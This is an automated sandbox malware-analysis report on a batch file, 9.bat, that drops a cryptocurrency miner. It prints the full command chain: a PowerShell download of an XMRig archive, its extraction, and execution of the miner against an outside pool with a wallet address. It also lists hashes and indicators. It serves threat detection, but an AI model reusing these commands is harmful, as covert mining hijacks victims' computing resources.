Analysis

  • max time kernel
    142s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    9.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4976
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
      xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2316
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2628 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:884

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      143a478fb47996f74bbbcdaa252b9e0b

      SHA1

      288893a45c1c50f8245a32aa06dfb1ac2ff31c83

      SHA256

      6d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b

      SHA512

      e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4dzw2v05.bf3.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3-msvc-win64.zip
      Filesize

      2.5MB

      MD5

      cef0ae1ab544e40b659261a4e07fe48f

      SHA1

      e5ff855ce3c7726a50eb50a634ff9f406b3df093

      SHA256

      713263085499ae626a6148fab67932c9a69611b21ac3d04cf52a5e23495f902e

      SHA512

      1fb23b385e6cff3653f0b4b397d092c7be4df62899c97e18f675df2024e5f06ef2596fb626b85ae2ef7d7583c5bf54b00dba1a5ad566c2707a669a48d9814ba8

    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
      Filesize

      6.1MB

      MD5

      c0f8959614ae06561216158d78a787e5

      SHA1

      73167d1fd0cee1c96a6505606d21cbfe4369eb00

      SHA256

      e199d88569fb54346d5fa20ee7b59b2ea6f16f4ecca3ea1e1c937b11aab7b2b0

      SHA512

      a24fcf344d08c64ac301d5e4979f062b5e28e8e4acf1d2790916149ffe7726b0c4a11e0775aeba6b841d2d5081e1bd13e2b80390bf9bfbc44d67e54ec07cd746

    • memory/1384-10-0x000002472ECF0000-0x000002472ED12000-memory.dmp
      Filesize

      136KB

    • memory/1384-11-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp
      Filesize

      10.8MB

    • memory/1384-12-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp
      Filesize

      10.8MB

    • memory/1384-13-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp
      Filesize

      10.8MB

    • memory/1384-17-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp
      Filesize

      10.8MB

    • memory/1384-0-0x00007FFED7BA3000-0x00007FFED7BA5000-memory.dmp
      Filesize

      8KB

    • memory/2316-61-0x000001E96CA60000-0x000001E96CA80000-memory.dmp
      Filesize

      128KB

    • memory/4976-19-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp
      Filesize

      10.8MB

    • memory/4976-33-0x0000014E7EE40000-0x0000014E7EE52000-memory.dmp
      Filesize

      72KB

    • memory/4976-32-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp
      Filesize

      10.8MB

    • memory/4976-34-0x0000014E7EAD0000-0x0000014E7EADA000-memory.dmp
      Filesize

      40KB

    • memory/4976-57-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp
      Filesize

      10.8MB

    • memory/4976-31-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp
      Filesize

      10.8MB

    • memory/4976-30-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp
      Filesize

      10.8MB